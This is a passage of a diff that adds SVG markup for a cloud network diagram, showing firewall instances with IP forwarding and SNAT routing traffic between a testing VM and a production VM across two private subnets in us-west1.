+              <path d="M 625.28 39.82876 L 627.49364 39.82876 C 627.5751 39.82876 627.6412 39.894875 627.6412 39.97634 L 627.6412 42.190006 C 627.6412 42.27147 627.5751 42.337583 627.49364 42.337583 L 625.28 42.337583 C 625.1985 42.337583 625.1324 42.27147 625.1324 42.190006 L 625.1324 39.97634 C 625.1324 39.894875 625.1985 39.82876 625.28 39.82876" fill="white"/>
+            </g>
+            <g id="Graphic_950">
+              <title>Fill-15</title>
+              <path d="M 629.8549 39.82876 L 632.06854 39.82876 C 632.15 39.82876 632.2161 39.894875 632.2161 39.97634 L 632.2161 42.190006 C 632.2161 42.27147 632.15 42.337583 632.06854 42.337583 L 629.8549 42.337583 C 629.7734 42.337583 629.7073 42.27147 629.7073 42.190006 L 629.7073 39.97634 C 629.7073 39.894875 629.7734 39.82876 629.8549 39.82876" fill="white"/>
+            </g>
+          </g>
+          <g id="Group_1243">
+            <g id="Graphic_972">
+              <rect x="699.5596" y="62.49998" width="162.48078" height="95.34739" fill="#fef8e0"/>
+              <rect x="699.5596" y="62.49998" width="162.48078" height="95.34739" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path_8)"/>
+            </g>
+            <g id="Graphic_971">
+              <rect x="715.5394" y="112.4807" width="130.48078" height=".9999998" fill="#dfdfdf"/>
+            </g>
+            <g id="Graphic_970">
+              <text transform="translate(720.5596 121.39997)" fill="#757575">
+                <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="9">- Destination: 10.50.1.0/24</tspan>
+                <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="20">- Next hop: virtual network</tspan>
+              </text>
+            </g>
+            <g id="Group_1242">
+              <g id="Graphic_969">
+                <text transform="translate(755.5483 83.49999)" fill="#212121">
+                  <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="11">Subnet routes</tspan>
+                </text>
+              </g>
+              <g id="Group_965">
+                <title>Cloud Routes</title>
+                <g id="Graphic_968">
+                  <title>Fill-6</title>
+                  <path d="M 741.7611 96.74675 L 738.2793 96.74675 L 730.7269 87.3039 L 728.5438 87.3039 L 728.5438 84.2145 L 732.0966 84.2145 L 739.6487 93.65702 L 741.7611 93.65702 L 741.7611 91.21374 L 746.5483 95.20044 L 741.7611 99.19035 Z" fill="#666"/>
+                </g>
+                <g id="Graphic_967">
+                  <title>Fill-8</title>
+                  <path d="M 737.9641 89.45176 L 739.6487 87.34263 L 741.761 87.34263 L 741.761 89.78623 L 746.5482 85.79953 L 741.761 81.80962 L 741.761 84.2529 L 738.2792 84.2529 L 736.0415 87.04996 Z" fill="#666"/>
+                </g>
+                <g id="Graphic_966">
+                  <title>Fill-10</title>
+                  <path d="M 732.4438 91.54796 L 730.727 93.69568 L 728.5439 93.69568 L 728.5439 96.7854 L 732.09645 96.7854 L 734.3632 93.94975 Z" fill="#666"/>
+                </g>
+              </g>
+            </g>
+          </g>
+          <g id="Group_974">
+            <g id="Graphic_977">
+              <rect x="699.5596" y="177.99996" width="162.48078" height="53.99999" fill="white"/>
+              <rect x="699.5596" y="177.99996" width="162.48078" height="53.99999" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path_9)"/>
+            </g>
+            <g id="Graphic_976">
+              <title>Shuffle</title>
+              <path d="M 722.7563 201.8162 L 716.9288 195.99996 L 715.3426 197.5862 L 721.1588 203.40246 L 722.7563 201.8162 Z M 727.1551 195.99996 L 729.4501 198.29496 L 715.3426 212.4137 L 716.9288 213.99996 L 731.0476 199.89246 L 733.3426 202.18746 L 733.3426 195.99996 L 727.1551 195.99996 Z M 727.5263 206.5862 L 725.9401 208.17246 L 729.4613 211.6937 L 727.1551 213.99996 L 733.3426 213.99996 L 733.3426 207.81246 L 731.0476 210.10746 L 727.5263 206.5862 Z" fill="#616161"/>
+            </g>
+            <g id="Graphic_975">
+              <text transform="translate(740.9596 197.99996)" fill="#212121">
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="11">VPC Routing</tspan>
+              </text>
+            </g>
+          </g>
+          <g id="Graphic_978">
+            <title>zone internal - green</title>
+            <rect x="630.77855" y="251.84735" width="301.90224" height="543.0549" fill="#e2f3ec"/>
+            <rect x="630.77855" y="251.84735" width="301.90224" height="543.0549" stroke="white" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"/>
+            <text transform="translate(640.77855 266.84735)" fill="#757575">
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="9">Region: us-west1</tspan>
+            </text>
+          </g>
+          <g id="Graphic_979">
+            <title>zone internal - purple</title>
+            <rect x="653.668" y="346.4288" width="259.01282" height="311.67345" fill="#ede7f7"/>
+            <rect x="653.668" y="346.4288" width="259.01282" height="311.67345" stroke="white" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"/>
+            <text transform="translate(663.668 361.4288)" fill="#757575">
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="9">Subnet: 10.50.1.0/24</tspan>
+            </text>
+          </g>
+          <g id="Graphic_993">
+            <title>zone internal - white</title>
+            <rect x="467.3192" y="423.59993" width="202.6808" height="214.50232" fill="white"/>
+            <rect x="467.3192" y="423.59993" width="202.6808" height="214.50232" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"/>
+            <text transform="translate(477.3192 438.59993)" fill="#757575">
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="9">Managed Instance Group</tspan>
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="20">third-party-template</tspan>
+            </text>
+          </g>
+          <g id="Group_1198">
+            <g id="Graphic_891">
+              <rect x="192.6144" y="271.99995" width="162.48078" height="55.99999" fill="white"/>
+              <rect x="192.6144" y="271.99995" width="162.48078" height="55.99999" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path_10)"/>
+            </g>
+            <g id="Graphic_1197">
+              <text transform="translate(231.22557 285.99994)" fill="#212121">
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="11">Regional Internal</tspan>
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="25">Backend Service</tspan>
+              </text>
+            </g>
+          </g>
+          <g id="Group_1212">
+            <g id="Graphic_895">
+              <rect x="192.6144" y="390.99993" width="162.48078" height="55.99999" fill="white"/>
+              <rect x="192.6144" y="390.99993" width="162.48078" height="55.99999" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path_11)"/>
+            </g>
+            <g id="Graphic_1211">
+              <text transform="translate(215.61847 404.99993)" fill="#212121">
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="11">Source: 10.30.1.100</tspan>
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="25">Destination: 10.50.1.100</tspan>
+              </text>
+            </g>
+          </g>
+          <g id="Group_1216">
+            <g id="Graphic_1024">
+              <rect x="697.9904" y="678.10225" width="186.7" height="96.8" fill="white"/>
+              <rect x="697.9904" y="678.10225" width="186.7" height="96.8" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path_12)"/>
+            </g>
+            <g id="Graphic_1215">
+              <text transform="translate(717.66755 691.90225)" fill="#212121">
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="11">Source address translated</tspan>
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="39">Firewall VM performs SNAT</tspan>
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="53">Source: 10.50.1.x</tspan>
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="67">Destination: 10.50.1.100</tspan>
+              </text>
+            </g>
+          </g>
+          <g id="Graphic_1221">
+            <text transform="translate(492.04296 582.4913)" fill="#757575">
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="28.408203" y="9">nic0</tspan>
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="6.274414" y="21">10.30.1.x</tspan>
+            </text>
+          </g>
+          <g id="Graphic_1222">
+            <text transform="translate(594.8547 582.4913)" fill="#757575">
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="9">nic1</tspan>
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="21">10.50.1.x</tspan>
+            </text>
+          </g>
+          <g id="Group_994">
+            <g id="Graphic_1003">
+              <rect x="710.1" y="467.4804" width="162.48078" height="98.39998" fill="white"/>
+              <rect x="710.1" y="467.4804" width="162.48078" height="98.39998" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path_13)"/>
+            </g>
+            <g id="Graphic_1002">
+              <rect x="726.1" y="521.48036" width="130.48078" height=".9999998" fill="#dfdfdf"/>
+            </g>
+            <g id="Graphic_1001">
+              <text transform="translate(727.7202 534.17106)" fill="#757575">
+                <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="37.211503" y="9">10.50.1.100</tspan>
+              </text>
+            </g>
+            <g id="Graphic_1000">
+              <text transform="translate(775.2798 488.48037)" fill="#212121">
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="11">production-vm</tspan>
+              </text>
+            </g>
+            <g id="Group_995">
+              <title>Compute Engine</title>
+              <g id="Graphic_999">
+                <title>Fill-1</title>
+                <path d="M 765.946 494.1941 L 760.192 484.18805 C 759.7306 483.3892 758.8946 482.90224 758.0342 482.90224 L 746.526 482.90224 C 745.604 482.90224 744.79875 483.44277 744.368 484.1874 L 738.614 494.17356 C 738.1531 494.9722 738.1842 495.9297 738.6134 496.6752 L 744.3676 506.727 C 744.8287 507.5256 745.665 508.0585 746.52535 508.0585 L 758.0334 508.0585 C 758.9558 508.0585 759.7608 507.4773 760.1915 506.73266 L 765.94555 496.72615 C 766.4067 495.9273 766.3754 494.9394 765.946 494.1941" fill="#4285f4"/>
+              </g>
+              <g id="Graphic_998">
+                <title>Fill-4</title>
+                <path d="M 764.2945 499.5972 L 754.8251 490.12775 L 754.1461 491.59753 L 752.6695 490.12097 L 751.9859 491.584 L 750.5266 490.12447 L 750.16765 491.8937 L 748.8687 492.11707 L 748.5992 493.2723 L 746.91855 493.6737 L 748.4244 495.17957 L 746.9347 495.84304 L 748.4244 497.3327 L 746.9251 497.973 L 757.0104 508.0585 L 758.0335 508.0585 C 758.9557 508.0585 759.7609 507.47726 760.19165 506.73264 Z" fill="black" fill-opacity=".07"/>
+              </g>
+              <g id="Graphic_997">
+                <title>Fill-7</title>
+                <path d="M 753.5552 493.96997 L 751.0597 493.9702 C 750.91315 493.9706 750.7944 494.0892 750.7939 494.23575 L 750.79415 496.7308 C 750.7948 496.8774 750.91315 496.99594 751.0597 496.9968 L 753.555 496.9968 C 753.7016 496.99616 753.8201 496.8774 753.8208 496.7308 L 753.8208 494.23575 C 753.8203 494.0892 753.7018 493.9704 753.5552 493.96997" fill="white"/>
+              </g>
+              <g id="Graphic_996">
+                <title>Fill-9</title>
+                <path d="M 755.3954 498.57144 L 749.2192 498.57144 L 749.2192 492.39503 L 755.3958 492.3948 Z M 757.5056 493.7688 C 757.6371 493.76834 757.7436 493.6618 757.7441 493.53034 L 757.7441 493.14184 C 757.7436 493.0104 757.6371 492.90406 757.5056 492.9036 L 756.2918 492.9036 L 756.2918 491.76897 C 756.2909 491.6226 756.1726 491.50406 756.0262 491.5034 L 754.887 491.5034 L 754.8872 490.28497 C 754.88655 490.1535 754.78 490.0474 754.6488 490.04675 L 754.26005 490.0472 C 754.1288 490.0476 754.0223 490.1537 754.0216 490.28497 L 754.02205 491.5032 L 752.7402 491.5032 L 752.7402 490.28475 C 752.7395 490.1535 752.6332 490.0472 752.50195 490.04653 L 752.113 490.04697 C 751.98155 490.0474 751.8752 490.1537 751.8746 490.28497 L 751.875 491.5032 L 750.5931 491.5034 L 750.5931 490.28475 C 750.5925 490.1535 750.4862 490.0472 750.3549 490.04653 L 749.966 490.04697 C 749.8347 490.0474 749.7284 490.1537 749.7278 490.28497 L 749.728 491.5034 L 748.58895 491.5034 C 748.4424 491.50384 748.3238 491.6222 748.3232 491.76875 L 748.3232 492.9034 L 747.1093 492.9034 C 746.9781 492.90406 746.8718 493.0104 746.8711 493.1416 L 746.8715 493.5308 C 746.872 493.66203 746.9783 493.76834 747.1095 493.7688 L 748.3232 493.7688 L 748.3234 495.0509 L 747.1093 495.05044 C 746.9781 495.0511 746.8718 495.1574 746.8713 495.28866 L 746.8715 495.6774 C 746.8718 495.80885 746.9781 495.91516 747.1095 495.9156 L 748.3234 495.9156 L 748.3234 497.1977 L 747.1093 497.1975 C 746.9781 497.1981 746.8718 497.30444 746.8713 497.4357 L 746.8715 497.8242 C 746.8718 497.95566 746.9781 498.0622 747.1095 498.0626 L 748.3234 498.0626 L 748.3234 499.1977 C 748.324 499.3443 748.4426 499.4626 748.58895 499.4633 L 749.728 499.4633 L 749.728 500.6813 C 749.7284 500.81275 749.8347 500.9193 749.9662 500.9197 L 750.3547 500.9197 C 750.4862 500.9193 750.5925 500.81254 750.5927 500.6813 L 750.5929 499.4633 L 751.8746 499.4633 L 751.8748 500.6813 C 751.875 500.81275 751.98155 500.9193 752.1132 500.9197 L 752.5017 500.9197 C 752.6332 500.9193 752.7395 500.81254 752.7397 500.6813 L 752.73995 499.4633 L 754.0216 499.4633 L 754.0218 500.6813 C 754.0223 500.81275 754.1286 500.9193 754.2603 500.9197 L 754.64855 500.9197 C 754.78 500.9193 754.8868 500.81275 754.887 500.6813 L 754.8872 499.4633 L 756.026 499.4633 C 756.1724 499.4626 756.2909 499.3443 756.2916 499.1977 L 756.2918 498.0626 L 757.5056 498.0624 C 757.6371 498.0622 757.7436 497.9559 757.7441 497.8244 L 757.7441 497.4359 C 757.7439 497.30444 757.6371 497.1979 757.5056 497.1977 L 756.2918 497.1977 L 756.2918 495.9156 L 757.5056 495.9154 C 757.6371 495.91516 757.7436 495.80885 757.7441 495.6774 L 757.7441 495.2891 C 757.7436 495.1576 757.6371 495.0509 757.5056 495.05066 L 756.2918 495.05066 L 756.2918 493.7688 Z" fill="white"/>
+              </g>
+            </g>
+          </g>
+          <g id="Graphic_1244">
+            <path d="M 547.15254 565.3022 L 547.15254 617.66656 L 547.65254 617.16656 L 367.24038 617.16656 L 367.74038 617.66656 L 367.74038 565.8999 C 367.74038 565.6238 367.5165 565.3999 367.24038 565.3999 C 366.96424 565.3999 366.74038 565.6238 366.74038 565.8999 L 366.74038 617.66656 C 366.74038 617.9427 366.96424 618.16656 367.24038 618.16656 L 547.65254 618.16656 C 547.9287 618.16656 548.15254 617.9427 548.15254 617.66656 L 548.15254 565.3022 C 548.15254 565.0261 547.9287 564.8022 547.65254 564.8022 C 547.3764 564.8022 547.15254 565.0261 547.15254 565.3022 Z" fill="#4384f5"/>
+          </g>
+          <g id="Graphic_1245">
+            <path d="M 587.8192 565.4915 L 587.8192 617.3914 C 587.8192 617.6676 588.0431 617.8914 588.3192 617.8914 L 791.3404 617.8914 C 791.6165 617.8914 791.8404 617.6676 791.8404 617.3914 L 791.8404 565.88036 C 791.8404 565.6042 791.6165 565.38036 791.3404 565.38036 C 791.0643 565.38036 790.8404 565.6042 790.8404 565.88036 L 790.8404 617.3914 L 791.3404 616.8914 L 588.3192 616.8914 L 588.8192 617.3914 L 588.8192 565.4915 C 588.8192 565.21535 588.59535 564.9915 588.3192 564.9915 C 588.0431 564.9915 587.8192 565.21535 587.8192 565.4915 Z" fill="#4384f5"/>
+          </g>
+          <g id="Group_1247">
+            <g id="Graphic_1252">
+              <path d="M 568.4952 417.59993 C 568.1952 417.59993 567.9952 417.39993 567.9952 417.09993 L 567.9952 299.99993 L 361.5952 299.99993 C 361.2952 299.99993 361.0952 299.69993 361.0952 299.49993 C 361.0952 299.29993 361.2952 298.99993 361.5952 298.99993 L 568.4952 298.99993 C 568.7952 298.99993 568.9952 299.19993 568.9952 299.49993 L 568.9952 417.09993 C 568.9952 417.29993 568.7952 417.59993 568.4952 417.59993 Z" fill="#616261"/>
+            </g>
+            <g id="Graphic_1251">
+              <path d="M 360.6952 297.29993 C 361.8952 298.49993 361.8952 300.39993 360.6952 301.49993 C 359.4952 302.69993 357.5952 302.69993 356.4952 301.49993 C 355.2952 300.29993 355.2952 298.39993 356.4952 297.29993 C 357.6952 296.19993 359.4952 296.19993 360.6952 297.29993" fill="#616261"/>
+            </g>
+            <g id="Graphic_1250">
+              <path d="M 358.5952 302.99993 C 357.6952 302.99993 356.7952 302.59993 356.0952 301.89993 C 355.4952 301.29993 355.0952 300.39993 355.0952 299.49993 C 355.0952 298.59993 355.4952 297.69993 356.0952 296.99993 C 357.3952 295.69993 359.7952 295.69993 361.0952 296.99993 C 361.7952 297.69993 362.0952 298.49993 362.0952 299.49993 C 362.0952 300.39993 361.6952 301.29993 361.0952 301.99993 C 360.3952 302.59993 359.4952 302.99993 358.5952 302.99993 Z M 358.5952 296.99993 C 357.8952 296.99993 357.2952 297.19993 356.7952 297.69993 C 356.2952 298.19993 356.0952 298.79993 356.0952 299.49993 C 356.0952 300.19993 356.3952 300.79993 356.7952 301.29993 C 357.6952 302.19993 359.3952 302.19993 360.2952 301.29993 C 360.7952 300.79993 361.0952 300.09993 361.0952 299.49993 C 361.0952 298.89993 360.7952 298.19993 360.3952 297.69993 C 359.8952 297.19993 359.2952 296.99993 358.5952 296.99993 Z" fill="#616261"/>
+            </g>
+            <g id="Graphic_1249">
+              <path d="M 566.3952 417.89993 C 567.5952 416.69993 569.4952 416.69993 570.5952 417.89993 C 571.7952 419.09993 571.7952 420.99993 570.5952 422.09993 C 569.3952 423.29993 567.4952 423.29993 566.3952 422.09993 C 565.1952 420.99993 565.1952 419.09993 566.3952 417.89993" fill="#616261"/>
+            </g>
+            <g id="Graphic_1248">
+              <path d="M 568.4952 423.59993 C 567.5952 423.59993 566.6952 423.29993 565.9952 422.59993 C 564.5952 421.19993 564.5952 418.99993 565.9952 417.59993 C 567.2952 416.29993 569.5952 416.29993 570.8952 417.59993 C 572.2952 418.99993 572.2952 421.19993 570.8952 422.59993 C 570.2952 423.19993 569.3952 423.59993 568.4952 423.59993 Z M 568.4952 417.59993 C 567.8952 417.59993 567.1952 417.79993 566.6952 418.29993 C 565.6952 419.29993 565.6952 420.89993 566.6952 421.79993 C 567.6952 422.79993 569.2952 422.79993 570.1952 421.79993 C 571.1952 420.79993 571.1952 419.19993 570.1952 418.29993 C 569.7952 417.79993 569.0952 417.59993 568.4952 417.59993 Z" fill="#616261"/>
+            </g>
+          </g>
+          <g id="Group_1253">
+            <g id="Graphic_1258">
+              <path d="M 97.27232 495.4011 L 72.77232 495.4011 C 72.47232 495.4011 72.27232 495.2011 72.27232 494.9011 L 72.27232 299.9011 C 72.27232 299.6011 72.47232 299.4011 72.77232 299.4011 L 186.37232 299.4011 C 186.67232 299.4011 186.87232 299.6011 186.87232 299.9011 C 186.87232 300.2011 186.67232 300.4011 186.37232 300.4011 L 73.27232 300.4011 L 73.27232 494.4011 L 97.27232 494.4011 C 97.57232 494.4011 97.77232 494.6011 97.77232 494.9011 C 97.77232 495.2011 97.57232 495.4011 97.27232 495.4011 Z" fill="#616261"/>
+            </g>
+            <g id="Graphic_1257">
+              <path d="M 187.27232 302.0011 C 186.07232 300.8011 186.07232 298.9011 187.27232 297.8011 C 188.47232 296.6011 190.37232 296.6011 191.47232 297.8011 C 192.67232 299.0011 192.67232 300.9011 191.47232 302.0011 C 190.37232 303.2011 188.47232 303.2011 187.27232 302.0011" fill="#616261"/>
+            </g>
+            <g id="Graphic_1256">
+              <path d="M 189.37232 303.4011 C 188.47232 303.4011 187.57232 303.0011 186.87232 302.4011 C 186.17232 301.7011 185.87232 300.9011 185.87232 299.9011 C 185.87232 299.0011 186.27232 298.1011 186.87232 297.4011 C 188.17232 296.1011 190.47232 296.1011 191.77232 297.4011 C 193.17232 298.8011 193.17232 301.0011 191.77232 302.3011 C 191.17232 303.0011 190.27232 303.4011 189.37232 303.4011 Z M 189.37232 297.4011 C 188.67232 297.4011 188.07232 297.7011 187.57232 298.1011 C 187.07232 298.5011 186.87232 299.2011 186.87232 299.9011 C 186.87232 300.6011 187.17232 301.2011 187.57232 301.7011 C 188.47232 302.6011 190.17232 302.6011 191.07232 301.7011 C 192.07232 300.7011 192.07232 299.1011 191.07232 298.2011 C 190.67232 297.6011 190.07232 297.4011 189.37232 297.4011 Z" fill="#616261"/>
+            </g>
+            <g id="Graphic_1255">
+              <path d="M 98.17232 497.0011 C 96.97232 495.8011 96.97232 493.9011 98.17232 492.8011 C 99.37232 491.6011 101.27232 491.6011 102.37232 492.8011 C 103.47232 494.0011 103.57232 495.9011 102.37232 497.0011 C 101.17232 498.1011 99.37232 498.2011 98.17232 497.0011" fill="#616261"/>
+            </g>
+            <g id="Graphic_1254">
+              <path d="M 100.27232 498.4011 C 99.37232 498.4011 98.47232 498.0011 97.77232 497.4011 C 96.37232 496.0011 96.37232 493.8011 97.77232 492.5011 C 99.07232 491.2011 101.37232 491.2011 102.67232 492.5011 C 104.07232 493.9011 104.07232 496.1011 102.67232 497.4011 C 102.07232 498.0011 101.27232 498.4011 100.27232 498.4011 Z M 100.27232 492.4011 C 99.57232 492.4011 98.97232 492.7011 98.47232 493.1011 C 97.47232 494.1011 97.47232 495.7011 98.47232 496.6011 C 99.37232 497.5011 101.07232 497.5011 101.97232 496.6011 C 102.97232 495.6011 102.97232 494.0011 101.97232 493.1011 C 101.57232 492.6011 100.97232 492.4011 100.27232 492.4011 Z" fill="#616261"/>
+            </g>
+          </g>
+          <g id="Graphic_988">
+            <rect x="503.4192" y="521.48036" width="130.48078" height=".9999998" fill="#dfdfdf"/>
+          </g>
+          <g id="Group_1263">
+            <g id="Graphic_1209">
+              <title>Stroke-21</title>
+              <line x1="492.2624" y1="570.1581" x2="645.0568" y2="570.1581" stroke="#dedfdf" stroke-linecap="butt" stroke-linejoin="round" stroke-width="1.732"/>
+            </g>
+            <g id="Graphic_1208">
+              <title>Stroke-22</title>
+              <line x1="498.04296" y1="574.8247" x2="639.27626" y2="574.8247" stroke="#dedfdf" stroke-linecap="butt" stroke-linejoin="round" stroke-width="1.601"/>
+            </g>
+            <g id="Graphic_989">
+              <rect x="487.4192" y="467.4804" width="162.48078" height="98.39998" fill="white"/>
+              <rect x="487.4192" y="467.4804" width="162.48078" height="98.39998" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path_14)"/>
+            </g>
+            <g id="Graphic_987">
+              <text transform="translate(505.0394 530.48036)" fill="#757575">
+                <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="28.520097" y="9">can_ip_forward: </tspan>
+                <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="53.70076" y="20">True</tspan>
+              </text>
+            </g>
+            <g id="Graphic_986">
+              <text transform="translate(552.599 481.48037)" fill="#212121">
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="11">Firewall</tspan>
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="25">Instances</tspan>
+              </text>
+            </g>
+            <g id="Group_981">
+              <title>Compute Engine</title>
+              <g id="Graphic_985">
+                <title>Fill-1</title>
+                <path d="M 543.2652 494.1941 L 537.5112 484.18805 C 537.04985 483.3892 536.2138 482.90224 535.35344 482.90224 L 523.8452 482.90224 C 522.9232 482.90224 522.11796 483.44277 521.68725 484.1874 L 515.93324 494.17356 C 515.47233 494.9722 515.5034 495.9297 515.9326 496.6752 L 521.6868 506.727 C 522.14793 507.5256 522.9842 508.0585 523.84456 508.0585 L 535.35257 508.0585 C 536.27504 508.0585 537.08004 507.4773 537.51076 506.73266 L 543.26476 496.72615 C 543.7259 495.9273 543.6946 494.9394 543.2652 494.1941" fill="#4285f4"/>
+              </g>
+              <g id="Graphic_984">
+                <title>Fill-4</title>
+                <path d="M 541.61374 499.5972 L 532.1443 490.12775 L 531.46527 491.59753 L 529.9887 490.12097 L 529.3051 491.584 L 527.8458 490.12447 L 527.48686 491.8937 L 526.1879 492.11707 L 525.9184 493.2723 L 524.23776 493.6737 L 525.74364 495.17957 L 524.25395 495.84304 L 525.74364 497.3327 L 524.2443 497.973 L 534.3296 508.0585 L 535.3527 508.0585 C 536.2749 508.0585 537.08015 507.47726 537.51087 506.73264 Z" fill="black" fill-opacity=".07"/>
+              </g>
+              <g id="Graphic_983">
+                <title>Fill-7</title>
+                <path d="M 530.8744 493.96997 L 528.3789 493.9702 C 528.23236 493.9706 528.1136 494.0892 528.11314 494.23575 L 528.11336 496.7308 C 528.114 496.8774 528.23236 496.99594 528.3789 496.9968 L 530.8742 496.9968 C 531.02077 496.99616 531.1393 496.8774 531.14 496.7308 L 531.14 494.23575 C 531.13955 494.0892 531.021 493.9704 530.8744 493.96997" fill="white"/>
+              </g>
+              <g id="Graphic_982">
+                <title>Fill-9</title>
+                <path d="M 532.7146 498.57144 L 526.5384 498.57144 L 526.5384 492.39503 L 532.715 492.3948 Z M 534.82486 493.7688 C 534.9563 493.76834 535.06286 493.6618 535.0633 493.53034 L 535.0633 493.14184 C 535.06286 493.0104 534.9563 492.90406 534.82486 492.9036 L 533.611 492.9036 L 533.611 491.76897 C 533.61014 491.6226 533.4918 491.50406 533.34545 491.5034 L 532.2062 491.5034 L 532.2064 490.28497 C 532.20576 490.1535 532.0992 490.0474 531.968 490.04675 L 531.57926 490.0472 C 531.448 490.0476 531.3415 490.1537 531.3408 490.28497 L 531.34126 491.5032 L 530.0594 491.5032 L 530.0594 490.28475 C 530.0587 490.1535 529.9524 490.0472 529.82116 490.04653 L 529.4322 490.04697 C 529.30076 490.0474 529.19444 490.1537 529.1938 490.28497 L 529.1942 491.5032 L 527.91235 491.5034 L 527.91235 490.28475 C 527.9117 490.1535 527.8054 490.0472 527.6741 490.04653 L 527.2852 490.04697 C 527.15394 490.0474 527.0476 490.1537 527.047 490.28497 L 527.0472 491.5034 L 525.90816 491.5034 C 525.7616 491.50384 525.64304 491.6222 525.6424 491.76875 L 525.6424 492.9034 L 524.42853 492.9034 C 524.2973 492.90406 524.191 493.0104 524.1903 493.1416 L 524.19075 493.5308 C 524.1912 493.66203 524.2975 493.76834 524.42875 493.7688 L 525.6424 493.7688 L 525.6426 495.0509 L 524.42853 495.05044 C 524.2973 495.0511 524.191 495.1574 524.19053 495.28866 L 524.19075 495.6774 C 524.191 495.80885 524.2973 495.91516 524.42875 495.9156 L 525.6426 495.9156 L 525.6426 497.1977 L 524.42853 497.1975 C 524.2973 497.1981 524.191 497.30444 524.19053 497.4357 L 524.19075 497.8242 C 524.191 497.95566 524.2973 498.0622 524.42875 498.0626 L 525.6426 498.0626 L 525.6426 499.1977 C 525.64325 499.3443 525.7618 499.4626 525.90816 499.4633 L 527.0472 499.4633 L 527.0472 500.6813 C 527.0476 500.81275 527.15394 500.9193 527.2854 500.9197 L 527.6739 500.9197 C 527.8054 500.9193 527.9117 500.81254 527.9119 500.6813 L 527.9121 499.4633 L 529.1938 499.4633 L 529.194 500.6813 C 529.1942 500.81275 529.30076 500.9193 529.43244 500.9197 L 529.82095 500.9197 C 529.9524 500.9193 530.0587 500.81254 530.05895 500.6813 L 530.05916 499.4633 L 531.3408 499.4633 L 531.34104 500.6813 C 531.3415 500.81275 531.4478 500.9193 531.5795 500.9197 L 531.96776 500.9197 C 532.0992 500.9193 532.206 500.81275 532.2062 500.6813 L 532.2064 499.4633 L 533.3452 499.4633 C 533.4916 499.4626 533.61014 499.3443 533.6108 499.1977 L 533.611 498.0626 L 534.82486 498.0624 C 534.9563 498.0622 535.06286 497.9559 535.0633 497.8244 L 535.0633 497.4359 C 535.0631 497.30444 534.9563 497.1979 534.82486 497.1977 L 533.611 497.1977 L 533.611 495.9156 L 534.82486 495.9154 C 534.9563 495.91516 535.06286 495.80885 535.0633 495.6774 L 535.0633 495.2891 C 535.06286 495.1576 534.9563 495.0509 534.82486 495.05066 L 533.611 495.05066 L 533.611 493.7688 Z" fill="white"/>
+              </g>
+            </g>
+          </g>
+          <g id="Group_932">
+            <g id="Graphic_772">
+              <rect x="286" y="466.4999" width="162.48078" height="99.39999" fill="white"/>
+              <rect x="286" y="466.4999" width="162.48078" height="99.39999" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path_15)"/>
+            </g>
+            <g id="Graphic_771">
+              <rect x="302" y="520.4999" width="130.48078" height=".9999998" fill="#dfdfdf"/>
+            </g>
+            <g id="Graphic_770">
+              <text transform="translate(303.6202 534.57105)" fill="#757575">
+                <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="37.211503" y="9">10.30.1.100</tspan>
+              </text>
+            </g>
+            <g id="Group_931">
+              <g id="Graphic_769">
+                <text transform="translate(358.18533 487.57105)" fill="#212121">
+                  <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="11">testing-vm</tspan>
+                </text>
+              </g>
+              <g id="Group_764">
+                <title>Compute Engine</title>
+                <g id="Graphic_768">
+                  <title>Fill-1</title>
